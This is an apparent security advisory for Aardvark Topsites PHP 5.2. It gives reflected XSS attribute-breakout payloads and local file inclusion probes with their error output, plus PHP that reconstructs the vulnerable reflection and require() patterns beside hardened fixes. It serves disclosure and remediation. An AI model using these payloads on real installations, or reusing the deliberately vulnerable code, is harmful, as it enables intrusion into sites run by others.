
Aardvark Topsites PHP 5.2 Multi Vulnerability

Author: indoushka, Published: 11-11-2014
Aardvark Topsites PHP 5.2 Multi Vulnerability
=============================================
Author : indoushka
Vendor : www.p30vel.ir http://www.aardvarktopsitesphp.com/ http://www.avatic.com/
Dork : My Topsites List - Powered by Aardvark Topsites PHP 5.2.1
======================================

Cross site scripting (verified) :

This vulnerability affects /rank/index.php.

Attack details :

Each value below is reflected into an HTML attribute between double quotes without being encoded, so the " in the payload closes the attribute and the rest of the string is parsed as further attributes of the same tag; the injected onmouseover handler then runs as soon as the element is hovered. Only q arrives in the query string. The other four are POST fields, so using them against a victim needs an attacker-controlled page that submits the form on the victim's behalf.

URL encoded GET input q was set to 1" onmouseover=prompt(999881) bad="
URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(932713) bad="
URL encoded POST input title was set to Mr." onmouseover=prompt(903995) bad="
URL encoded POST input u was set to 1" onmouseover=prompt(986160) bad="
URL encoded POST input url was set to #" onmouseover=prompt(915056) //
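The pattern behind these findings, shown as an added example rather than code taken from Aardvark Topsites PHP: the parameter names q, u, title, email and url are the advisory's, while the function names, the markup and the choice of allowed URL schemes are assumptions made here for illustration.

```php
<?php
// Added example, not code from Aardvark Topsites PHP: a reconstruction of the
// reflection pattern the scanner findings describe, next to a hardened form.
// The parameter names (q, u, title, email, url) are the advisory's; function
// names, markup and the set of allowed URL schemes are assumptions.

// VULNERABLE: request input dropped straight into a double-quoted attribute.
// With q = 1" onmouseover=prompt(999881) bad="  the first quote closes the
// value attribute and onmouseover becomes a real attribute of the <input>.
function render_search_vulnerable(array $get): string
{
    $q = $get['q'] ?? '';
    return '<input type="text" name="q" value="' . $q . '">';
}

// HARDENED, step 1: encode for the HTML attribute context. ENT_QUOTES covers
// both quote styles, so the same helper stays safe in single-quoted attributes;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function html_attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// HARDENED, step 2, for the url field only: attribute encoding stops the
// #" ... // payload from breaking out, but a value such as javascript:...
// would still run if the stored URL is later rendered as an href. Accept only
// absolute http(s) URLs and drop everything else.
function safe_url(string $url): string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return '';
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return '';
    }
    return $url;
}

function render_form_hardened(array $post): string
{
    $fields = ['u' => 'Username', 'title' => 'Title', 'email' => 'E-mail'];
    $html = '';
    foreach ($fields as $name => $label) {
        $html .= '<label>' . $label . ' <input type="text" name="' . $name
               . '" value="' . html_attr($post[$name] ?? '') . '"></label>' . "\n";
    }
    $html .= '<label>URL <input type="text" name="url" value="'
           . html_attr(safe_url($post['url'] ?? '')) . '"></label>' . "\n";
    return $html;
}

// Constructed input using the advisory's own payloads; compare the two outputs.
$xss = '1" onmouseover=prompt(999881) bad="';
echo render_search_vulnerable(['q' => $xss]), "\n";
echo render_form_hardened([
    'u'     => $xss,
    'title' => 'Mr." onmouseover=prompt(903995) bad="',
    'email' => 'sample@email.tst" onmouseover=prompt(932713) bad="',
    'url'   => '#" onmouseover=prompt(915056) //',
]), "\n";
```

In the vulnerable output the payload's first quote terminates value="1" and onmouseover=prompt(999881) becomes an attribute of the input. In the hardened output every quote from the payloads is emitted as &quot;, so the whole string stays inside the attribute, and the url field comes out empty because #" onmouseover=... carries no scheme or host. Encoding is the fix for the reflection; the scheme check is the extra step that the url field needs on top of it.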

File inclusion :

Both probes below produced a PHP "Failed opening required" error that echoes the full constructed path. That path is the request value wedged between a fixed directory prefix and a fixed .php suffix, which means the script concatenates the parameter straight into a require() call. Because of the prefix, the URL in the probe is not fetched as a remote file; the practical issue is local file inclusion, i.e. directory traversal with ../ relative to the languages and sources/sql directories. The %00 in the probe is meant to cut off the .php suffix, but the reported path still carries the suffix and the %00 unchanged, so this probe alone does not show the suffix being dropped; whether it can be depends on the PHP version (null-byte truncation of include paths was removed in PHP 5.3.4). The error text itself also discloses the relative directory layout of the installation.

URL encoded GET input l was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found:
Failed opening required '../languages/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg.php'

URL encoded POST input sql was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found:
Failed opening required '../sources/sql/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg.php'
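The include pattern the two error messages point to, and an allow-listed replacement, as an added example that is not the project's code: the directory names ../languages/ and ../sources/sql/ and the parameter names l and sql are taken from the error text above, while the function names, the name-validation rule and the default language file are assumptions.

```php
<?php
// Added example, not code from Aardvark Topsites PHP: the include pattern the
// two error messages point to, next to an allow-listed replacement. The
// directories ../languages/ and ../sources/sql/ and the parameters l and sql
// come from the advisory; function names and the default file are assumed.

// VULNERABLE: the request value is concatenated between a fixed directory and
// a fixed ".php" suffix, which is exactly what the error text shows:
//   Failed opening required '../languages/<value>.php'
// Nothing stops l=../../../some/other/file from leaving the directory, and on
// PHP versions older than 5.3.4 a NUL byte in the value also cuts off ".php".
function load_language_vulnerable(string $l): void
{
    require '../languages/' . $l . '.php';
}

// HARDENED: treat the parameter as a key, not a path. Resolve the file inside
// the intended directory and refuse anything that does not stay there.
function resolve_include(string $dir, string $name): ?string
{
    // Bare file names only: no separators, dots, NUL bytes or other metacharacters.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $base = realpath($dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;           // directory or file does not exist
    }
    // Belt and braces: the resolved file must sit directly under $base.
    if (dirname($path) !== $base) {
        return null;
    }
    return $path;
}

function load_language_hardened(string $l, string $default = 'english'): void
{
    $dir  = __DIR__ . '/../languages';
    $path = resolve_include($dir, $l) ?? resolve_include($dir, $default);
    if ($path === null) {
        throw new RuntimeException('no usable language file');
    }
    require $path;
}

// The POST parameter sql selects a file under ../sources/sql/ the same way and
// gets the same treatment. Letting a request pick the database driver is
// questionable in itself; that value belongs in the site's configuration.
function load_sql_driver_hardened(string $sql): void
{
    $path = resolve_include(__DIR__ . '/../sources/sql', $sql);
    if ($path === null) {
        throw new RuntimeException('unknown sql driver');
    }
    require $path;
}

// Checks with constructed input: the advisory's probe (with a real NUL byte)
// and a traversal attempt are both rejected by the name check before any
// file system access happens.
$probe = "http://some-inexistent-website.acu/some_inexistent_file_with_long_name?\0.jpg";
var_dump(resolve_include(__DIR__ . '/../languages', $probe));
var_dump(resolve_include(__DIR__ . '/../languages', '../../config'));
```

Both var_dump calls report NULL, since neither value matches the bare-name pattern. The regex is the real control; the realpath() comparison only guards against a symlink inside the directory pointing elsewhere. Rejecting and falling back to a fixed default also removes the verbose "Failed opening required" error, which is what leaked the directory layout in the first place.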
